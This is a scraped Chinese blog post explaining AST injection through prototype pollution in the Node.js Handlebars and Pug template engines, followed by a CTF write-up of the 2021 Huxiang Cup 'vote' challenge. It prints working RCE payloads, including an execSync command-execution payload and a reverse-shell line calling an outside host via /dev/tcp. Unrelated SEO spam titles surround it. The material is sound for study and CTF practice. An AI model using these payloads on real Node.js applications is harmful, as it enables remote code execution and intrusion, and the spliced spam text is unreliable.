当前位置: 首页 > news >正文

做一个棋牌网站要多少钱做网站备负责人风险大吗

news 2025/9/28 4:44:55
做一个棋牌网站要多少钱,做网站备负责人风险大吗,网站建立需要哪些材料,新媒体营销推广方案文章目录 概念漏洞Handlebarspug 例题 [湖湘杯 2021 final]vote 概念 什么是AST注入 在NodeJS中,AST经常被在JS中使用,作为template engines(引擎模版)和typescript等。对于引擎模版,结构如下图所示。 如果在JS应用中存在原型污染漏洞&…

文章目录

  • 概念
  • 漏洞
    • Handlebars
    • pug
  • 例题 [湖湘杯 2021 final]vote

概念

什么是AST注入

在NodeJS中,AST经常被在JS中使用,作为template engines(引擎模版)和typescript等。对于引擎模版,结构如下图所示。
在这里插入图片描述
如果在JS应用中存在原型污染漏洞,任何 AST 都可以通过在Parser(解析器)或Compiler(编译器)过程中插入到函数中。
在这里插入图片描述在这里,你可以在没有过滤、没有经过lexer(分析器)或parser(解析器)验证的输入(没有被适当的过滤)的情况下插入AST。

然后我们可以向Parser(编译器)非预期的输入。

下面就是展示实际中在handlebars和pug使用AST注入执行任意命令

漏洞

Handlebars

本地测试,代码如下

const Handlebars = require('handlebars');const source = `Hello {{ msg }}`;
const template = Handlebars.compile(source);console.log(template({"msg": "posix"}));

这是如何在handlebars使用模板的方法,运行结果为下图
在这里插入图片描述

Handlebar.compile函数将字符串转换为模板函数并传递对象因子以供调用

const Handlebars = require('handlebars');Object.prototype.pendingContent = `<script>alert(origin)</script>`const source = `Hello {{ msg }}`;
const template = Handlebars.compile(source);console.log(template({"msg": "posix"}));

在这里,我们可以使用原型污染来影响编译过程。
你可以插入任意字符串payload到Object.prototype.pendingContent中决定你想要的攻击。
在这里插入图片描述
构造payload

{"type": "MustacheStatement","path": 0,"params": [{"type": "NumberLiteral","value": "console.log(process.mainModule.require('child_process').execSync('id').toString())"}],"loc": {"start": 0,"end": 0}
}

pug

本地测试,源码如下

const pug = require('pug');
const source = `h1= msg`;
var fn = pug.compile(source);
var html = fn({msg: 'It works'});console.log(html);

此为在 pug 中使用模板的常见方法,运行结果为下图

在这里插入图片描述

pug.compile函数将字符串转换为模板函数并传递对象以供调用

const pug = require('pug');
Object.prototype.block = {"type":"Text","val":`<script>alert(origin)</script>`};
const source = `h1= msg`;
var fn = pug.compile(source, {});
var html = fn({msg: 'It works'});
console.log(html);

在这里插入图片描述

构造payload

 {"__proto__.block": {        "type": "Text",         "line": "process.mainModule.require('child_process').execSync(`bash -c 'bash -i >& /dev/tcp/p6.is/3333 0>&1'`)"}
}

例题 [湖湘杯 2021 final]vote

考察的是pug模板引擎下的rce

源码如下

const path              = require('path');
const express           = require('express');
const pug               = require('pug');
const { unflatten }     = require('flat');
const router            = express.Router();router.get('/', (req, res) => {return res.sendFile(path.resolve('views/index.html'));
});router.post('/api/submit', (req, res) => {const { hero } = unflatten(req.body);if (hero.name.includes('奇亚纳') || hero.name.includes('锐雯') || hero.name.includes('卡蜜尔') || hero.name.includes('菲奥娜')) {return res.json({'response': pug.compile('You #{user}, thank for your vote!')({ user:'Guest' })});} else {return res.json({'response': 'Please provide us with correct name.'});}
});module.exports = router;

给了./api/submit路由,然后看到pug.compile
稍微修改下payload,直接使用(这道题反弹shell不成功)

{"hero.name":"锐雯","__proto__.block": {"type": "Text","line": "process.mainModule.require('child_process').execSync('cat /f* > ./static/1.txt')"}
}

成功RCE
在这里插入图片描述

再访问一下static目录的1.txt,得到flag

在这里插入图片描述

http://www.yayakq.cn/news/404204/

相关文章:

  • 如何建设一个电子商务网站网站建设管理员工工资多少钱
  • 养殖公司网站搜狗收录提交
  • 做某健身房网站的设计与实现wordpress 招聘模板
  • 多导航织梦网站模板下载地址深圳福田口岸
  • 河北省建设部网站株洲最新通知今天
  • 做h5好的网站在线拼图网页版
  • 找专业做网站wordpress 添加登录界面
  • 深圳大浪有做网站的吗吉林省四平市网站建设
  • 公司网站制作视频北京建网站公司怎么样
  • 网站托管服务器南阳网站开发公司
  • wordpress整站迁移站群推广
  • 禁用wordpress 昵称深圳seo技术
  • 网站建设最低价建设网站的效益分析
  • 保定设计网站建设建设什么样的网站月入一万
  • 成都微信网站建设报价单江门免费建站
  • 网站的文本链接怎么做用手机制作表格的软件
  • 网站建设丿金手指谷哥14备案成功的网站可以更换域名吗
  • 石家庄兼职建站福建市建设厅网站
  • 郴州网站维护wordpress 付费 破解
  • 怎么做公司展示网站广元网络推广
  • 公司建设官方网站需要多少钱福步外贸论坛注册
  • 旅游电子商务网站建设规划书网页设计首页多少钱一页
  • 宁波网站建设制作哪家好wordpress 静态设置
  • 域名网站建设方案书学习如何做网站
  • 贵卅省住房和城乡建设厅网站浙江建设人才网官网
  • 公司网站地址网站开发需要用到哪些软件
  • 建设银行网站app如何做手机网站
  • 巢湖网站制作网站流量分析怎么做
  • 厦门电商网站广州网站建设网站建设
  • win7电脑做网站个人可以备案网站的内容